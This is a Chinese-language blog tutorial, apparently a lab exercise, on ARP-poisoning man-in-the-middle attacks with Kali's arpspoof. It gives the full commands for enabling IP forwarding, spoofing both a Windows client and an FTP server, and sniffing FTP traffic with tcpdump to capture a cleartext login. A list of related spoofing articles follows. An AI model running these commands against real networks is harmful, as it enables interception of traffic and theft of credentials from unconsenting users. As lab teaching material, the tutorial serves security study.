使用kali-arpspoof工具进行中间人arp投毒

简介: 一、环境部署准备工作,打开环境win10 172.20.10.9 B4-6D-83-2B-27-D5 kali 172.

一、环境部署

  • 准备工作,打开环境
win10             172.20.10.9                B4-6D-83-2B-27-D5
 
kali              172.20.10.12               00:50:56:2e:fc:32

win7~server~ftp   172.20.10.11               00-0C-29-39-45-E7  
  • 欺骗之前,查看win10里面arp表,并记录
img_d9c5c59aa6959eb1a408951798d8f0b1.png
1.png
  • 查看win7-server-ftp里面arp表并记录
img_1b7590f2b53eec6879fcc79fbf3ade7b.png
2.png

二、开始实验

step1:首先打开kali的流量转发
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
img_bd8e02eebcb1118a534f2d42c55131b5.png
图片.png
step2:然后开始欺骗
  • 首先欺骗ftp(172.20.10.11)说我kali(172.20.10.12)是win10(172.20.10.9)
root@kali:~# arpspoof -i eth0 -t 172.20.10.11 172.20.10.9
img_aff8c46a447aa1c82d8cc0239f19e639.png
图片.png
  • 然后欺骗win10(172.20.10.9)说我kali(172.20.10.12)是ftp(172.20.10.11)
root@kali:/# arpspoof -i eth0 -t 172.20.10.9 172.20.10.11
img_72861285938ac35ecd3424554b2e5f54.png
图片.png
  • 两边欺骗完之后我们此时可以再次看下arp表。

首先看下win10里面的arp表,可以看到在win10里面将要访问的ftp()的mac地址已经变成了kali的mac地址

img_17a3ff01fac15546f93cae3f809d736a.png
图片.png

然后再去ftp的主机上面查看arp表,可以看到在ftp服务的主机上面,win10的mac地址也变成了中间人kali的mac地址

img_9f1aa7d28129ff4f848e75258debecaf.png
图片.png

经上面双方欺骗,我们欺骗已经完成,kali的路由转发也开启了,
这样我们接下来抓取数据包,就可以看到他们之间传输的数据

step3:开启抓包,然后只要它们之间有数据传输,就会抓到包,打开之后等待即可:
root@kali:~# tcpdump -i eth0 -nn -X tcp port 21
img_c9c09dd261ffb44bdab2a8c011e11cf1.png
图片.png
step4:然后我们登录访问ftp服务
img_a28025e3a9305f1bfb78b325f23e259d.png
图片.png

成功登录了ftp服务器,然后我们去看抓到的包:

img_c768f9606e3e73c31bacad40d4dd8b3b.png
图片.png

显然抓到了登录用户名和密码。
注:ftp服务是20/21端口,并且传输过程用的是明文传输

目录
相关文章
|
5月前
|
网络协议 安全 Apache
#ettercap的dns欺骗实验
#ettercap的dns欺骗实验
75 0
|
5月前
|
域名解析 缓存 网络协议
探索网络攻击:ARP断网、ARP欺骗和DNS欺骗实验解析
在这篇博客中,我介绍了ARP断网、ARP欺骗和DNS欺骗这几种常见的网络攻击方式。然而,需要明确的是,这些实验仅仅是出于教育和研究目的,并且应以合法和道德的方式进行。
283 0
|
7月前
|
网络协议 Linux 网络安全
Kali Linux中的ARP欺骗攻击如何进行
Kali Linux中的ARP欺骗攻击如何进行
189 0
|
网络协议 网络安全 Windows
KALI ARP 攻击
KALI ARP 断网攻击剖析(局域网内)
308 0
|
网络协议 安全
kali:加速WEP黑客攻击,ARP请求重播攻击
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396280 ...
1009 0
|
安全 数据安全/隐私保护 Ruby
kali下Bettercap:用于嗅探流量和密码的MITM攻击
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396271 ...
3008 0
|
Web App开发
kali下一个虚假的tor访问方案
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396364 1、并没有真的安装tor浏览器,但是却使用了tor的服务、2、项目地址:https://github.com/susmithHCK/torghost3、使用说明,可以直接在项目地址查看使用说明。
968 0
|
网络协议 Linux